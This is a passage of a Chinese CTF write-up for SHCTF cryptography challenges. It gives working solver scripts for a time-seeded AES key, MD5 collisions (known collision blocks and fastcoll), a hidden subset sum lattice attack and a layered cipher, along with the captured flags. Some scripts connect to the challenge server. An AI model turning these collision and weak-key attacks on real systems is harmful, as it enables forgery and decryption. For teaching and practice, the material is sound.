f:\n        f.write('n'.join(out_lines))\n\nif __name__ == \"__main__\":\n    main()\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u903b\u8f91<\/strong>\uff1a\u9898\u76ee\u6e90\u7801\u4f7f\u7528 time()<\/code> \u751f\u6210\u79cd\u5b50\u4f5c\u4e3a\u5bc6\u94a5\uff0c\u5c06 Flag \u8f6c\u4e3a\u4e8c\u8fdb\u5236\u540e\u6309 7bit \u5206\u7ec4\uff0c\u6bcf\u7ec4\u5355\u72ec\u8fdb\u884c AES-CBC \u52a0\u5bc6\u3002<\/p>\n\n\n\n
\u7ebf\u7d22<\/strong>\uff1a\u9898\u76ee\u63d0\u793a\u201cAES\u8bde\u751f\u7684\u65f6\u95f4\u201d\u4e14\u9644\u4ef6\u63d0\u5230 FIPS 197<\/strong>\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
NIST \u4e8e 2001\u5e7411\u670826\u65e5<\/strong> \u6b63\u5f0f\u53d1\u5e03 FIPS 197\uff08AES\u6807\u51c6\uff09\u3002<\/p>\n\n\n\n
\u6784\u5efa\u5bc6\u94a5<\/strong>\uff1a<\/p>\n\n\n\n
\u53d6\u8be5\u65e5\u671f\u96f6\u70b9\u65f6\u95f4\u6233\uff08UTC+8\uff09\uff1a1006704000\u3002\n\n\u6839\u636e\u6e90\u7801 int(time() * 10**6) \u903b\u8f91\uff0c\u79cd\u5b50\u4e3a 1006704000000000\uff0816\u4f4d\uff09\u3002\n\nKey = \u79cd\u5b50 * 2 = b'10067040000000001006704000000000'\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u6d41\u7a0b<\/p>\n\n\n\n
\u63d0\u53d6\u6570\u636e\uff1a\u4ece data.txt \u63d0\u53d6 IV \u548c\u6240\u6709\u5bc6\u6587\u5757\uff0832\u4f4d Hex\uff09\u3002\n\u9010\u5757\u89e3\u5bc6\uff1a\u4f7f\u7528\u8ba1\u7b97\u51fa\u7684 Key \u548c IV \u5bf9\u6bcf\u4e2a\u5bc6\u6587\u5757\u8fdb\u884c AES-CBC \u89e3\u5bc6\u3002\n\u6570\u636e\u8fd8\u539f\uff1a\u89e3\u5bc6\u540e\u5f97\u5230\u7684\u662f Flag \u7684 7bit \u4e8c\u8fdb\u5236\u7247\u6bb5\uff0c\u62fc\u63a5\u6240\u6709\u7247\u6bb5\u3002\n\u8f6c\u7801\uff1a\u5c06\u5b8c\u6574\u7684\u4e8c\u8fdb\u5236\u5b57\u7b26\u4e32\u8f6c\u4e3a ASCII \u5b57\u7b26\u5373\u5f97 Flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import re\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n\niv_hex = \"d966f3a0c51cd460764b0b62ad10796a\"\nraw_data = \"\"\"\n50b46ebd11b82c5b5c802913e60b4ad5\ne4c04d26cab88eb53ff35618797b36e3\ne666c6ae95791f32509ac9485bec53c0\n5a012218f52fc3dabf8c1a62ffdf528f\n7b1fe7de83532b470cee24bad1bdc50e\n684ac74414d4c72121d99ccd8cb68662\n1dfd5287ba9548cf80eb9c5d598d17a9\ne666c6ae95791f32509ac9485bec53c0\nf0125aba503835d048f45bb2e1e2472b\n099069650820d9bfb5b016648c002078\nf34fcd626acfbcf1b83145989cbca94e\n3ff5000e47d7f68d535b8471bb26fba4\n4a5535d6cc72fbc62cef774824bc46e1\n2fb7071182f7ed8c9acbc8bdf83de3fd\n4d79df16626b4031651cd8174fd0e806\n0aea4d6b0c0e42403c7df9a2952a8d2c\na6493b26d3337ffdbe1b2c83bbd2739e\nd69612f3057925b553f39611d9225c62\ndb870abe80d5eff1471a09c6db97cd81\nec2023d57d870da28af5d7479f58a8c7\n4a5535d6cc72fbc62cef774824bc46e1\ndee13aeb1c13fb3b70cd1cb08cdda12b\ncc45333beaa5fc6aded6d9fbf17f8169\n099069650820d9bfb5b016648c002078\n99992fd4689125b0fb33881276cf0526\nef6335b6121381fac5175b2104d03ce0\nf34fcd626acfbcf1b83145989cbca94e\n0e7c2f8959e79f1baf526b4305677b15\n837edc45fdafa37a9c8b04d1676f99f0\n2fb7071182f7ed8c9acbc8bdf83de3fd\n4815fbfcc88d1e0a1deebb0628122205\nc627216b0c71593a60eaab811d7a8b14\naf29c5c8861ea09b2d3ccd450b723b1a\n10dc01f1052c63d1df6ef6e796589008\nbea46045dfb08b8425d2cb7fb486f809\n4e0bbab19e2a62ffa47f68aec7910305\n684ac74414d4c72121d99ccd8cb68662\n50e489ec38984d1d851f1a67c5382889\nd69612f3057925b553f39611d9225c62\nef270a10b5cc257757212a82583f80d1\nf9e53372cecefd4388e41a8d7ea71715\ne4c04d26cab88eb53ff35618797b36e3\n10dc01f1052c63d1df6ef6e796589008\n9a9449200e0ebbc4bc3ae6dd592bb6a1\n837edc45fdafa37a9c8b04d1676f99f0\n2fb7071182f7ed8c9acbc8bdf83de3fd\nf810a2efc313cbe8acb222c8e2288bec\n9a9449200e0ebbc4bc3ae6dd592bb6a1\naf29c5c8861ea09b2d3ccd450b723b1a\ne1951078acf5c87748ff42f9f9d5fc2b\ncc45333beaa5fc6aded6d9fbf17f8169\n0e7c2f8959e79f1baf526b4305677b15\n602468ea5e8bfe0eeaefecfc28c7f2dd\nd042cb7ba9c25886c3f5b072cfc830a4\n1641c7c3f60cb8fe6ad008566ecb596c\nb543b4b57b7334541273a331a4ae0e77\n0ef83387d23cd7b3087610a869173033\nf174f12b81364591583b7e7f50c30b40\ndb870abe80d5eff1471a09c6db97cd81\n9d72039a047870f380e5f58f48186b94\nbcf718eee8728257e6ade850a58270fe\n8dde48dd948d11dc532d47de0c1b2b60\n9eb452aa005c262eb883c0511b3bd98c\n06a0067316f0a412285a45d6991634a6\na8074111b395f36ce86ac7960ca803b8\ne666c6ae95791f32509ac9485bec53c0\naf29c5c8861ea09b2d3ccd450b723b1a\naad6d56935d0f49473f7aab9c6ea77c4\n\"\"\"\n\nkey = b'10067040000000001006704000000000'\niv = bytes.fromhex(iv_hex)\nciphertexts = re.findall(r'[0-9a-f]{32}', raw_data.lower())\n\ndef decrypt_chunk(ct_hex):\n    ct = bytes.fromhex(ct_hex)\n    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))\n    decryptor = cipher.decryptor()\n    padded_pt = decryptor.update(ct) + decryptor.finalize()\n    pad_len = padded_pt[-1]\n    return padded_pt[:-pad_len].decode('utf-8')\n\nbin_str = \"\"\nfor ct in ciphertexts:\n    try:\n        bin_str += decrypt_chunk(ct)\n    except:\n        pass\n\nclean_bin = \"\"\nfor c in bin_str:\n    if c in '01':\n        clean_bin += c\n    else:\n        break\n\nval = int(clean_bin, 2)\nnum_bytes = (val.bit_length() + 7) \/\/ 8\nprint(val.to_bytes(num_bytes, \"big\").decode())<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{HE1lO_ctf3r_W3Lcome_tO_5hc7f_THi5_iS_e5aY_cRypt0@!!!}<\/code><\/pre>\n\n\n\n
\u7b2c\u4e8c\u9636\u6bb5<\/h2>\n\n\n\n
hash1<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
hash1.py<\/p>\n\n\n\n
import hashlib\n\nwith open(\"\/flag.txt\",\"r\") as f:\n    flag = f.read().strip()\n\nmsg = input(f\"Give me both different apples (hex(apple1), hex(apple2)) : \")\n\ntry:\n    apples = msg.split(\",\")\n    apple1 = bytes.fromhex(apples[0])\n    apple2 = bytes.fromhex(apples[1])\n    hash_apple1 = hashlib.md5(apple1).hexdigest()\n    hash_apple2 = hashlib.md5(apple2).hexdigest()\n\n    if apple1 == apple2:\n        print(f\"Oh snap, both apples are exactly the same\")\n    elif hash_apple1 != hash_apple2:\n        print(f\"Oh no, they taste different\")\n    else:\n        print(f\"Yeah, both apples are delicious!!! This is your prize: {flag}\")\n\nexcept:\n    print(f\"format fault :(\")\n    exit()<\/code><\/pre>\n\n\n\n
\u89e3\u9898\u601d\u8def<\/p>\n\n\n\n
\u9898\u76ee\u8981\u6c42\u8f93\u5165\u4e24\u4e2a apple\uff08\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\uff09\uff0c\u9700\u6ee1\u8db3\u4e24\u4e2a\u6761\u4ef6\uff1a\n\u5185\u5bb9\u4e0d\u540c\uff1aapple1 != apple2\nMD5 \u54c8\u5e0c\u76f8\u540c\uff1amd5(apple1) == md5(apple2)<\/code><\/pre>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a MD5 \u54c8\u5e0c\u78b0\u649e\u653b\u51fb\u3002\u7531\u4e8e MD5 \u7b97\u6cd5\u5df2\u88ab\u8bc1\u5b9e\u4e0d\u5b89\u5168\uff08\u5982 Wang’s Attack\uff09\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u5df2\u77e5\u7684\u78b0\u649e\u6837\u672c\uff08Collision Blocks\uff09\u6765\u6b3a\u9a97\u6821\u9a8c\u3002<\/p>\n\n\n\n
\u76f4\u63a5\u4f7f\u7528\u4e00\u7ec4\u6807\u51c6\u7684 128 \u5b57\u8282 MD5 \u78b0\u649e\u6570\u636e\u5373\u53ef\u901a\u8fc7\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
from pwn import *\nimport hashlib\n\nhost = 'challenge.shc.tf'\nport = 31394\n\nhex_1 = (\n    \"d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89\"\n    \"55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b\"\n    \"d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0\"\n    \"e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70\"\n)\n\nhex_2 = (\n    \"d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89\"\n    \"55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b\"\n    \"d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0\"\n    \"e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70\"\n)\n\nr = remote(host, port)\nr.recvuntil(b\": \")\n\npayload = f\"{hex_1}, {hex_2}\"\nr.sendline(payload.encode())\n\nresponse = r.recvall().decode()\nprint(response)<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{C#NGRatU1ATioNS_boTh_Ha5hI_APp1E5_4r3_VeRY_DeLlc10U5_IOl}<\/code><\/pre>\n\n\n\n
hash2<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
nc\u8fde\u63a5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u5206\u6790<\/p>\n\n\n\n
\u9898\u76ee\u8981\u6c42\u8f93\u5165\u4e24\u4e2a\u4e0d\u540c\u7684\u5b57\u7b26\u4e32\uff08apple1, apple2\uff09\uff0c\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\uff1a<\/p>\n\n\n\n
MD5 \u78b0\u649e\uff1amd5(apple1) == md5(apple2)\u3002\n\u5185\u5bb9\u4e0d\u540c\uff1aapple1 != apple2\u3002\n\u524d\u7f00\u9650\u5236\uff1a\u4e24\u4e2a\u5b57\u7b26\u4e32\u7684\u524d 16 \u5b57\u8282\u5fc5\u987b\u662f\u53ef\u89c1\u5b57\u7b26\uff08\u5b57\u6bcd\u6216\u6570\u5b57\uff09\u3002<\/code><\/pre>\n\n\n\n
\u89e3\u9898\u601d\u8def<\/p>\n\n\n\n
\u4e00\u4e2a\u7684 MD5 <\/strong>\uff08\u9009\u62e9\u524d\u7f00\u78b0\u649e\uff09\u95ee\u9898\u3002<\/p>\n\n\n\n
\u6784\u9020\u4e00\u4e2a\u6ee1\u8db3\u8981\u6c42\u7684 16 \u5b57\u8282\u524d\u7f00\u6587\u4ef6\uff08\u4f8b\u5982 16 \u4e2a a\uff09\u3002\n\u4f7f\u7528\u5de5\u5177 fastcoll \u57fa\u4e8e\u8be5\u524d\u7f00\u751f\u6210\u4e24\u4e2a MD5 \u76f8\u540c\u4f46\u5728\u524d\u7f00\u4e4b\u540e\u6709\u5dee\u5f02\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002\n\u5c06\u8fd9\u4e24\u4e2a\u6587\u4ef6\u7684\u5185\u5bb9\u8f6c\u4e3a Hex \u53d1\u9001\u7ed9\u670d\u52a1\u5668\u3002<\/code><\/pre>\n\n\n\n
\u64cd\u4f5c<\/p>\n\n\n\n
\u51c6\u5907 fastcoll.exe \u5de5\u5177\u3002\n\u751f\u6210\u524d\u7f00\uff1aecho -n \"aaaaaaaaaaaaaaaa\" > prefix.txt (\u6216\u8005\u7528\u4ee3\u7801\u751f\u6210)\u3002\n\u751f\u6210\u78b0\u649e\uff1afastcoll -p prefix.txt -o col1.bin col2.bin\u3002\n\u53d1\u9001 col1.bin \u548c col2.bin \u7684 Hex \u503c\u62ff\u5230 flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\nimport subprocess\nfrom pwn import *\n\nHOST = 'challenge.shc.tf'\nPORT = 30566\nFASTCOLL = '.\/fastcoll.exe'\n\ndef solve():\n    prefix = b\"a\" * 16\n    with open(\"prefix.txt\", \"wb\") as f:\n        f.write(prefix)\n\n    if not os.path.exists(FASTCOLL):\n        print(f\"Missing {FASTCOLL}\")\n        return\n\n    subprocess.run([FASTCOLL, \"-p\", \"prefix.txt\", \"-o\", \"col1.bin\", \"col2.bin\"], stdout=subprocess.DEVNULL)\n\n    with open(\"col1.bin\", \"rb\") as f: apple1 = f.read()\n    with open(\"col2.bin\", \"rb\") as f: apple2 = f.read()\n\n    try:\n        io = remote(HOST, PORT)\n        io.recvuntil(b\":\")\n        payload = apple1.hex() + \",\" + apple2.hex()\n        io.sendline(payload.encode())\n        io.interactive()\n    except Exception as e:\n        print(e)\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{alth#U9h_H4ShZ_@pPIe5_HAvE_5i6Ns_tH3Y_ar3_STIlL_DELlCIous}<\/code><\/pre>\n\n\n\n
\u9690\u85cf\u7684\u5b50\u96c6\u548c\uff1f<\/strong><\/h3>\n\n\n\n
task.py<\/p>\n\n\n\n
#!\/usr\/bin\/env python\n# coding: utf-8\n\n# sage\n\nfrom Crypto.Util.number import *\nfrom sage.all import *\n\ndef derive_M(n):\n    iota=0.035\n    Mbits=int(2 * iota * n^2 + n * log(n,2))\n    M = random_prime(2^Mbits, proof = False, lbound = 2^(Mbits - 1))\n    return Integer(M)\n\ndef genHssp(m, n, p, flag):\n    F = GF(p)\n    x = random_matrix(F, 1, n)\n    A = random_matrix(ZZ, n, m, x=0, y=3)\n    A[randint(0, n-1)] = vector(ZZ, list(bin(bytes_to_long(flag))[2:]))\n    h = x * A\n    return h\n\ndef data_write(p, h):\n    with open(\"data.txt\", \"w\") as file:\n        file.write(str(p) + \"n\")\n        h_list = list(h[0])\n        file.write(str(h_list) + \"n\")\n\nflag = b'SHCTF{test_test_flag_here_here_just_test_1}'\n\nm = bytes_to_long(flag).bit_length()\nn = 70\np = derive_M(n)\nh = genHssp(m, n, p, flag)\ndata_write(p, h)\n<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u539f\u7406\uff1a<\/strong><\/p>\n\n\n\n
\u9898\u76ee\u7ed9\u51fa\u4e86\u5927\u7d20\u6570 pp<\/em> \u548c\u5411\u91cf hh<\/em>\u3002
$$
\u751f\u6210\u903b\u8f91\u4e3a h=x\u22c5A(modp)h=x\u22c5A(modp)\u3002
$$
\u5176\u4e2d x \u662f\u968f\u673a\u6743\u91cd\u5411\u91cf\uff0cAA<\/em> \u662f\u4e3b\u8981\u7531\u5c0f\u6574\u6570\u6784\u6210\u7684\u77e9\u9635\uff08\u90e8\u5206\u884c\u4e3a 0-3 \u7684\u968f\u673a\u6570\uff0c\u5176\u4e2d\u4e00\u884c\u662f flag \u7684\u4e8c\u8fdb\u5236\u4f4d<\/strong>\uff09\u3002<\/p>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a \u9690\u85cf\u5b50\u96c6\u548c\u95ee\u9898 \uff0c\u4e14\u53c2\u6570\u6ee1\u8db3\u5bc6\u5ea6 d<1d<\/em><1\uff0c\u5bb9\u6613\u53d7\u5230 Nguyen-Stern \u6b63\u4ea4\u683c\u653b\u51fb\u3002<\/p>\n\n\n\n
\u89e3\u5bc6\u601d\u8def\uff1a<\/strong><\/p>\n\n\n\n
\u6784\u5efa\u6b63\u4ea4\u683c<\/strong>\uff1a\u6784\u9020\u683c\u57fa\u77e9\u9635\u5bfb\u627e\u77ed\u5411\u91cf u\uff0c
$$
\u4f7f\u5f97 h\u22c5u\u22610(modp)h\u22c5u\u22610(modp)\u3002\u6839\u636e HSSP \u6027\u8d28\uff0c\u8fd9\u4e9b uu \u4e5f\u6ee1\u8db3 A\u22c5u=0A\u22c5u=0\uff08\u5728\u6574\u6570\u57df\u4e0a\uff09\u3002
$$<\/p>\n\n\n\n
$$
\u7b5b\u9009\u6709\u6548\u5411\u91cf\uff1a\u5bf9\u4e0a\u8ff0\u683c\u8fdb\u884c LLL \u89c4\u7ea6\uff0c\u53d6\u524d m\u2212nm\u2212n \u4e2a\u6700\u77ed\u7684\u5411\u91cf\u4f5c\u4e3a AA \u7684\u6b63\u4ea4\u8865\u7a7a\u95f4\u57fa\u5e95\u3002
$$<\/p>\n\n\n\n
\u6062\u590d\u77e9\u9635 A<\/strong>\uff1a\u8ba1\u7b97\u8fd9\u4e9b\u5411\u91cf\u6784\u6210\u7684\u77e9\u9635\u7684\u53f3\u6838 \u3002\u6838\u7a7a\u95f4\u7684\u57fa\u5411\u91cf\u5373\u5305\u542b\u4e86\u77e9\u9635 A\u7684\u884c\u5411\u91cf\u3002<\/p>\n\n\n\n
\u63d0\u53d6 flag<\/strong>\uff1a\u5bf9\u6838\u7a7a\u95f4\u57fa\u8fdb\u884c LLL \u89c4\u7ea6\uff0c\u5bfb\u627e\u7531\u7eaf 0<\/code> \u548c 1<\/code> \u7ec4\u6210\u7684\u5411\u91cf\uff0c\u5c06\u5176\u8f6c\u4e3a\u5b57\u7b26\u4e32\u5373\u4e3a flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import sys\nfrom sage.all import *\nfrom Crypto.Util.number import long_to_bytes\n\ndef solve():\n    print(\"[*] Loading data from data.txt...\")\n    try:\n        with open(\"data.txt\", \"r\") as f:\n            raw_data = f.read()\n    except FileNotFoundError:\n        return\n\n    cleaned = raw_data.replace('[', ' ').replace(']', ' ').replace(',', ' ').replace('n', ' ')\n    values = [Integer(x) for x in cleaned.split() if x]\n\n    p = values[0]\n    h = values[1:]\n    m = len(h)\n    n = 70\n    target_orthogonal_count = m - n\n\n    print(f\"[*] Parameters: p = {p}\")\n    print(f\"[*] m = {m}, n = {n}\")\n    print(f\"[*] Target orthogonal vectors: {target_orthogonal_count}\")\n\n    C = 2**1000 \n    M = Matrix(ZZ, m + 1, m + 1)\n    for i in range(m):\n        M[i, i] = 1\n        M[i, m] = h[i] * C\n    M[m, m] = p * C\n\n    print(f\"[*] Running LLL on dimension {m+1}...\")\n    B = M.LLL()\n\n    us = []\n    for row in B:\n        if row[m] == 0 and not row[:m].is_zero():\n            us.append(row[:m])\n\n    print(f\"[*] Total valid modular vectors found: {len(us)}\")\n\n    us = us[:target_orthogonal_count]\n    print(f\"[*] Using top {len(us)} shortest vectors to compute kernel.\")\n\n    U_mat = Matrix(ZZ, us)\n    print(\"[*] Computing kernel...\")\n    K = U_mat.right_kernel()\n    print(f\"[*] Kernel dimension: {K.dimension()} (Expected ~{n})\")\n\n    print(\"[*] Running LLL on kernel basis to recover Flag...\")\n    basis_K = K.basis_matrix()\n    A_candidates = basis_K.LLL()\n\n    print(\"[*] Searching for binary vector...\")\n\n    for i, row in enumerate(A_candidates):\n        vec = list(row)\n\n        if all(x <= 0 for x in vec):\n             vec = [-x for x in vec]\n\n        if all(x in [0, 1] for x in vec):\n            binary_str = \"\".join(str(x) for x in vec)\n            try:\n                while len(binary_str) % 8 != 0:\n                    binary_str = \"0\" + binary_str\n\n                int_val = int(binary_str, 2)\n                flag_bytes = long_to_bytes(int_val)\n\n                if b'SHCTF{' in flag_bytes:\n                    print(f\"n[+] Flag found in row {i}:\")\n                    print(flag_bytes.decode())\n                    break\n            except:\n                pass\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{2c128cca-9600-4c9a-aeec-bd69e6e27de6}<\/code><\/pre>\n\n\n\n
Titanium Lock<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
task.py<\/p>\n\n\n\n
from secret import flag\nimport random\nfrom hashlib import md5\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.number import bytes_to_long\n\nclass Cipher:\n    def __init__(self):\n        self.seed = random.randint(100000, 999999)\n        self.c1 = [[random.randint(1, 100) for _ in range(12)] for _ in range(16)]\n        self.c2 = [random.randint(1, 1000) for _ in range(16)]\n        self.key = random.getrandbits(128)\n\n    def f1(self, msg):\n        random.seed(self.seed)\n        enc, last = [], 0\n        for c in str(bytes_to_long(msg)):\n            r = random.randint(100000, 999999)\n            last = ((int(c) + r) if int(c) % 2 == 0 else (int(c) * r)) ^ last\n            enc.append(last)\n        return enc\n\n    def f2(self, v):\n        v += [random.randint(0, 255) for _ in range(-len(v) % 12)]\n        res = []\n        for i in range(0, len(v), 12):\n            chunk = v[i:i+12]\n            res.extend([sum(self.c1[r][c] * chunk[c] for c in range(12)) + self.c2[r] for r in range(16)])\n        return res\n\n    def f3(self, data):\n        out = [[n := random.getrandbits(128), (bin(n & self.key).count('1') % 3) % 2] for _ in range(128 * 20)]\n        k = md5(str(self.key).encode()).digest()\n        return out, AES.new(k, AES.MODE_CTR, nonce=b\"Tiffanyx00\").encrypt(str(data).encode()).hex()\n\n    def encrypt(self, data):\n        o, c = self.f3(self.f2(self.f1(data)))\n        return {\"p1\": self.c1, \"p2\": self.c2, \"trace\": o, \"result\": c}\n\nif __name__ == \"__main__\":\n    res = Cipher().encrypt(flag)\n    with open(\"data.txt\", \"w\") as f:\n        for k, v in res.items():\n            f.write(f\"{k} = {v}n\")\n<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6<\/p>\n\n\n\n
\u9898\u76ee\u5b9e\u73b0\u4e86\u4e00\u4e2a\u591a\u5c42\u6df7\u5408\u52a0\u5bc6\u7cfb\u7edf\uff0c\u4e3b\u8981\u6d41\u7a0b\u5982\u4e0b\uff1a<\/p>\n\n\n\n
\u5bc6\u94a5\u751f\u6210\u4e0e\u6cc4\u9732\uff1a\u751f\u6210\u4e00\u4e2a 128-bit \u7684\u968f\u673a\u6574\u6570 key<\/code>\u3002\u9898\u76ee\u7ed9\u51fa\u7684 trace<\/code> \u662f\u5173\u4e8e\u8be5\u5bc6\u94a5\u7684\u7ebf\u6027\u65b9\u7a0b\u7ec4\u6cc4\u9732\uff0c\u8ba1\u7b97\u903b\u8f91\u4e3a<\/p>\n\n\n\n
(popcount(n & key) % 3) % 2<\/code><\/pre>\n\n\n\n
flag \u7f16\u7801\u4e0e\u6df7\u6dc6\uff1a<\/p>\n\n\n\n
flag \u88ab\u8f6c\u6362\u4e3a\u5341\u8fdb\u5236\u6570\u5b57\u5b57\u7b26\u4e32\u3002
$$
\u5229\u7528\u968f\u673a\u6570\u79cd\u5b50\uff08Seed\uff09\u751f\u6210\u5e8f\u5217 riri\u3002
$$<\/p>\n\n\n\n
$$
\u5947\u5076\u6df7\u6dc6\uff1a\u82e5\u6570\u5b57 dd \u4e3a\u5076\u6570\uff0c\u5bc6\u6587 D=d+rD=d+r\uff1b\u82e5\u4e3a\u5947\u6570\uff0c\u5bc6\u6587 D=d\u00d7rD=d\u00d7r\u3002
$$<\/p>\n\n\n\n
\u5f02\u6216\u94fe\uff1a\u6df7\u6dc6\u540e\u7684\u6570\u636e\u8fdb\u884c\u524d\u540e\u5f02\u6216\u5904\u7406\u3002<\/p>\n\n\n\n
\u7ebf\u6027\u53d8\u6362\uff1a\u6570\u636e\u88ab\u586b\u5145\u540e\uff0c\u7ecf\u8fc7\u4e00\u4e2a\u7ebf\u6027\u53d8\u6362
$$
y=P1\u22c5x+P2y=P1\u22c5x+P2
$$
AES \u52a0\u5bc6\uff1a\u53d8\u6362\u540e\u7684\u6570\u636e\u4f5c\u4e3a AES-CTR \u7684\u660e\u6587\uff0c\u5bc6\u94a5\u4e3a key<\/code> \u7684 MD5 \u503c\u3002<\/p>\n\n\n\n
\u89e3\u5bc6\u539f\u7406<\/p>\n\n\n\n
GF(3) \u7ebf\u6027\u4ee3\u6570\u6062\u590d\u5bc6\u94a5\uff1a\ntrace \u4e2d\u7684\u7ea6\u675f\u5173\u7cfb\u5b9e\u9645\u4e0a\u662f\u5728 GF(3) \u57df\u4e0a\u7684\u7ebf\u6027\u65b9\u7a0b\u3002\u901a\u8fc7\u6784\u5efa\u77e9\u9635\u5e76\u4f7f\u7528\u9ad8\u65af\u6d88\u5143\u6cd5\uff0c\u53ef\u4ee5\u77ac\u95f4\u89e3\u51fa\u539f\u59cb\u7684 128-bit key\u3002<\/code><\/pre>\n\n\n\n
AES \u89e3\u5bc6\u4e0e\u7ebf\u6027\u9006\u53d8\u6362\uff1a<\/p>\n\n\n\n
\u8ba1\u7b97 MD5(key)<\/code> \u89e3\u5bc6 AES \u5f97\u5230\u4e2d\u95f4\u6570\u636e f2_output<\/code>\u3002<\/p>\n\n\n\n
\u5229\u7528\u9898\u76ee\u63d0\u4f9b\u7684 P1P1\uff08\u53d6\u524d12\u884c\u6784\u6210\u53ef\u9006\u65b9\u9635\uff09\u548c P2P2\uff0c\u4f7f\u7528\u5206\u6570\uff08Fraction\uff09\u7cbe\u5ea6\u8ba1\u7b97
$$
x=P1\u22121(y\u2212P2)x=P1\u22121(y\u2212P2)\uff0c\u8fd8\u539f\u51fa\u6df7\u6dc6\u540e\u7684\u5e8f\u5217\u548c Padding\u3002
$$
\u7206\u7834 Seed\uff1a<\/p>\n\n\n\n
\u904d\u5386 100,000 \u5230 999,999 \u7684\u79cd\u5b50\uff0c\u91cd\u73b0\u968f\u673a\u6570\u751f\u6210\u8fc7\u7a0b\u3002\u82e5\u751f\u6210\u7684\u968f\u673a Padding \u4e0e\u89e3\u5bc6\u51fa\u7684 Padding \u4e00\u81f4\uff0c\u5373\u4e3a\u6b63\u786e Seed\u3002<\/p>\n\n\n\n
\u6a21\u62df\u9000\u706b\u53bb\u9664\u6df7\u6dc6\uff1a
$$
\u8fd8\u539f\u51fa DiDi\u200b \u548c riri\u200b \u540e\uff0c\u6bcf\u4e2a\u4f4d\u7f6e\u7684\u539f\u59cb\u6570\u5b57 dd \u5b58\u5728\u591a\u4e49\u6027\uff08\u53ef\u80fd\u662f D\u2212rD\u2212r \u7684\u5076\u6570\uff0c\u4e5f\u53ef\u80fd\u662f D\/rD\/r \u7684\u5947\u6570\uff09\u3002
$$
\u5229\u7528\u6a21\u62df\u9000\u706b\u7b97\u6cd5\u641c\u7d22\u6700\u4f18\u89e3\uff0c\u8bc4\u5206\u6807\u51c6\u4e3a\u201c\u89e3\u51fa\u7684 flag \u5305\u542b\u7684\u53ef\u6253\u5370\u5b57\u7b26\u6570\u91cf\u201d\u3002\u901a\u8fc7\u542f\u53d1\u5f0f\u7b56\u7565\uff08\u56fa\u5b9a flag \u7b2c3\u4f4d\u4ee5\u5bf9\u9f50 ASCII\uff09\u5feb\u901f\u6536\u655b\u5f97\u5230 flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import ast\nimport random\nimport math\nfrom hashlib import md5\nfrom fractions import Fraction\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.number import long_to_bytes\n\ndef gf3_add(a, b): return (a + b) % 3\ndef gf3_mul(a, b): return (a * b) % 3\ndef gf3_inv(x): return {1:1, 2:2}[x]\n\ndef gauss_elim_gf3(A, b):\n    n, m = len(A[0]), len(A)\n    M = [row[:] + [b[i] % 3] for i, row in enumerate(A)]\n    row = col = 0\n    pivot_cols = []\n    while row < m and col < n:\n        pivot = next((i for i in range(row, m) if M[i][col] != 0), None)\n        if pivot is None:\n            col += 1; continue\n        M[row], M[pivot] = M[pivot], M[row]\n        pivot_cols.append(col)\n        inv = gf3_inv(M[row][col])\n        for j in range(col, n+1): M[row][j] = gf3_mul(M[row][j], inv)\n        for i in range(m):\n            if i != row and M[i][col] != 0:\n                f = M[i][col]\n                for j in range(col, n+1):\n                    M[i][j] = gf3_add(M[i][j], gf3_mul(-f % 3, M[row][j]))\n        row += 1; col += 1\n    sol = [0]*n\n    for idx, c in enumerate(pivot_cols): sol[c] = M[idx][n] % 3\n    return sol\n\ndef invert_matrix(mat):\n    n = len(mat)\n    M = [row[:] + [Fraction(1 if i==j else 0) for j in range(n)] for i,row in enumerate(mat)]\n    for col in range(n):\n        pivot = next(i for i in range(col,n) if M[i][col] != 0)\n        M[col], M[pivot] = M[pivot], M[col]\n        piv = M[col][col]\n        for j in range(2*n): M[col][j] \/= piv\n        for i in range(n):\n            if i != col and M[i][col] != 0:\n                f = M[i][col]\n                for j in range(2*n): M[i][j] -= f * M[col][j]\n    return [M[i][n:] for i in range(n)]\n\ndef 